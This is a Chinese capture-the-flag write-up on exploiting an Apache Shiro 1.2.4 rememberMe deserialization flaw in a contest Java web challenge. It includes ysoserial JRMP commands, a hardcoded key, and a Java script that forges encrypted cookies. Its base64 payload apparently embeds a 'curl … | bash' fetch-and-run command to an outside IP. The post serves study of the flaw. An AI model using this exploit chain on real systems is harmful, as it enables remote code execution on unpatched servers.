一叶飘零 嘶吼专业版 

前言

前段时间参加了OPPO举办的OGeek网络安全比赛线下赛,遇到一道Java Web,由于不太擅长,只是做了防御没有***成功,趁周末复盘一下~

代码分析

拿到题目,发现没有啥功能:

顺势看了一眼源码:

看到shiro后立刻可以想到shiro的反序列化漏洞:

https://paper.seebug.org/shiro-rememberme-1-2-4/

可以看到存在漏洞的shiro版本号为:1.2.4,我们查看题目当前版本:

那么显然,是存在shiro反序列化***的。

shiro反序列化

查阅相关资料可以知道,该漏洞的利用,涉及如下几个重要的点:

- rememberMe cookie

- CookieRememberMeManager.java

- Base64

- 加密算法

- 加密密钥硬编码

- Java serialization

我们可以知道,***的可控点在登录时的RememberMe,但是该值是需要序列化、加密、Base64的,那么很自然的,我们第一步应该是去寻找它对应的加解密算法,我们查看配置文件:webapps/web/WEB-INF/classes/spring-shiro.xml,发现如下关键信息:

可以得知我们的加解密算法位置在ShiroRememberManager类中,我们进行查看:

private byte[] getKeyFromConfig() {

    try {

        InputStream fileInputStream = this.getClass().getResourceAsStream("remember.key");

        String key = "";

        if (fileInputStream != null && fileInputStream.available() >= 32) {

            byte[] bytes = new byte[fileInputStream.available()];

            fileInputStream.read(bytes);

            key = new String(bytes);

            fileInputStream.close();

        } else {

            BufferedWriter writer = new BufferedWriter(new FileWriter(this.getClass().getResource("/").getPath() + "com/collection/shiro/manager/remember.key"));

            key = RandomStringUtils.random(32, "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_=");

            writer.write(key);

            writer.close();

        }

        key = (new Md5Hash(key)).toString();

        return key.getBytes();

    } catch (Exception var4) {

        var4.printStackTrace();

        return null;

    }

}

我们关注到关键点:加密密钥硬编码,其密钥位置为:com/collection/shiro/manager/remember.key

我们可以查看其值为:

$ cat remember.key

wR&_(NVG#c&9(CDhaDMZELDmxSe(mwbB

找到了密钥位置,我们去查看一下加解密算法:

private CipherService cipherService = new ShiroCipherService();

关注到ShiroCipherService类:

public ByteSource encrypt(byte[] plaintext, byte[] key) throws CryptoException {

    String sign = (new Md5Hash(UUID.randomUUID().toString())).toString() + "asfda-92u134-";

    Subject subject = SecurityUtils.getSubject();

    HttpServletRequest servletRequest = WebUtils.getHttpRequest(subject);

    String user_agent = servletRequest.getHeader("User-Agent");

    String ip_address = servletRequest.getHeader("X-Forwarded-For");

    ip_address = ip_address == null ? servletRequest.getRemoteAddr() : ip_address;

    String data = "{\"user_is_login\":\"1\",\"sign\":\"" + sign + "\",\"ip_address\":\"" + ip_address + "\",\"user_agent\":\"" + user_agent + "\",\"serialize_data\":\"" + Base64.getEncoder().encodeToString(plaintext) + "\"}";

    byte[] data_bytes = data.getBytes();

    byte[] okey = (new Sha1Hash(new String(key))).toString().getBytes();

    byte[] mkey = (new Sha1Hash(UUID.randomUUID().toString())).toString().getBytes();

    byte[] out = new byte[2 * data_bytes.length];

    for(int i = 0; i < data_bytes.length; ++i) {

        out[i * 2] = mkey[i % mkey.length];

        out[i * 2 + 1] = (byte)(mkey[i % mkey.length] ^ data_bytes[i]);

    }

    byte[] result = new byte[out.length];

    for(int i = 0; i < out.length; ++i) {

        result[i] = (byte)(out[i] ^ okey[i % okey.length]);

    }

    return Util.bytes(result);

}

以往的加密算法一般为AES,可以发现这里出题人自己编写了一个加密规则,简单看一下,应该是一个异或加密,相应的解密规则也不需要我们编写,出题人也直接给出了解密规则:

public ByteSource decrypt(byte[] ciphertext, byte[] key) throws CryptoException {

    String skey = (new Sha1Hash(new String(key))).toString();

    byte[] bkey = skey.getBytes();

    byte[] data_bytes = new byte[ciphertext.length];

    for(int i = 0; i < ciphertext.length; ++i) {

        data_bytes[i] = (byte)(ciphertext[i] ^ bkey[i % bkey.length]);

    }

    byte[] jsonData = new byte[ciphertext.length / 2];

    for(int i = 0; i < jsonData.length; ++i) {

        jsonData[i] = (byte)(data_bytes[i * 2] ^ data_bytes[i * 2 + 1]);

    }

    JSONObject jsonObject = new JSONObject(new String(jsonData));

    String serial = (String)jsonObject.get("serialize_data");

    return Util.bytes(Base64.getDecoder().decode(serial));

}

但值得注意的是,其中加密算法还是带有一个随机值:

byte[] mkey = (new Sha1Hash(UUID.randomUUID().toString())).toString().getBytes();

但该值是用于签名,在解密时,并不会校验签名,所以并没有什么影响。

Exp编写

拥有了密钥、加密算法,那么剩下的就是构造我们的exp了,不同往上存在的exp,我们需要自己进行改写exp加密部分,首先我们查看lib文件下:

我们发现使用了commons-collections-3.1.jar,通过ysoserial.jar进行查看:

在内网环境中,***目标为:192.168.1.185,而***者为192.168.1.230,

我们通过ysoserial.jar进行exp构造:

java -jar ysoserial.jar JRMPClient '192.168.1.230:22222' | base64 > poc

生成对应exp,然后编写我们的payload加密脚本:

import java.io.InputStream;

import java.io.OutputStream;

import java.util.Base64;

import java.util.UUID;

import com.alibaba.fastjson.JSON;

import com.sun.xml.internal.rngom.parse.host.Base;

import org.apache.shiro.SecurityUtils;

import org.apache.shiro.crypto.CryptoException;

import org.apache.shiro.crypto.hash.Md5Hash;

import org.apache.shiro.crypto.hash.Sha1Hash;

import org.apache.shiro.subject.Subject;

import org.apache.shiro.util.ByteSource;

import org.json.JSONObject;

import org.omg.PortableInterceptor.SYSTEM_EXCEPTION;

/**

 * Hello world!

 */

public class App {

    public static void main(String[] args) throws Exception {

        String b64_pay = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxl\n" +

        "Y3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhh\n" +

        "bmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVy\n" +

        "AAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3\n" +

        "QwAKVW5pY2FzdFJlZgAaY3VybCAxMDYuMTQuMTE0LjEyNyB8IGJhc2gAALXUAAAAADbgqhEAAAAA\n" +

        "AAAAAAAAAAAAAAB4"

        String json = "{\"user_is_login\":\"1\",\"sign\":\"d912fc80c68563b2f5ad7b784d56e0c1asfda-92u134-\",\"ip_address\":\"192.168.1.185\",\"user_agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36\",\"serialize_data\":\""+b64_pay+"\"}";

        String key = "wR&_(NVG#c&9(CDhaDMZELDmxSe(mwbB";

        key = (new Md5Hash(key)).toString();

        byte[] key_b = key.getBytes();

        //System.out.println(decrypt(cipher_b, key_b));

        System.out.println(encrypt(json, key_b));

    }

    public static ByteSource encrypt(String data, byte[] key) throws CryptoException {

        byte[] data_bytes = data.getBytes();

        byte[] okey = (new Sha1Hash(new String(key))).toString().getBytes();

        byte[] mkey = (new Sha1Hash(UUID.randomUUID().toString())).toString().getBytes();

        byte[] out = new byte[2 * data_bytes.length];

        for(int i = 0; i < data_bytes.length; ++i) {

            out[i * 2] = mkey[i % mkey.length];

            out[i * 2 + 1] = (byte)(mkey[i % mkey.length] ^ data_bytes[i]);

        }

        byte[] result = new byte[out.length];

        for(int i = 0; i < out.length; ++i) {

            result[i] = (byte)(out[i] ^ okey[i % okey.length]);

        }

        return ByteSource.Util.bytes(result);

    }

}

运行即可生成对应的RememberMe的值,并将该值作为RememberMe的值,放于Cookie中,先运行以下命令,再将请求发送给***目标:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 22222 CommonsCollections5 'open -a Calculator'

即可命令执行。

后记

还是对Java不太熟练,比赛的时候,这个漏洞的难度还是低于PHP的(,以后还得加加油~

本文为嘶吼特约作者 一叶飘零 原创文章,未经授权禁止转载。

©著作权归作者所有:来自51CTO博客作者mob604756ebed9f的原创作品,如需转载,请注明出处,否则将追究法律责任

更多相关文章

  1. ***链分析标准化
  2. 新WhiteShadow下载器用Microsoft SQL提取恶意软件
  3. CVE-2019-16928:Exim RCE漏洞分析
  4. Intel Thunderbolt曝出7个漏洞,影响过去9年销售的数百万计算机
  5. Deemon & CSRF漏洞自动挖掘工具分析
  6. Mac上小巧且功能全面的闹钟与睡眠计时软件:Awaken
  7. 【胖猴小玩闹】智能门锁与网关:云丁鹿客智能门锁BLE通信的分析
  8. 软件测试女孩可以不?
  9. 前端工程师和后端工程师的区别?

随机推荐

  1. Google搜索框的配置
  2. android GridView实现选中图片放大。
  3. Windows 下 Android NDK 环境配置
  4. rockchip rk3368(px5)车载开发之路-bug解
  5. Android Bluetooth How To--Based on And
  6. Android和。net加密。
  7. Android中高效的显示图片之三——缓存图
  8. Android Studio(四):Android Studio集成Ge
  9. 安卓如何限制横屏和竖屏
  10. Android 学习网站汇总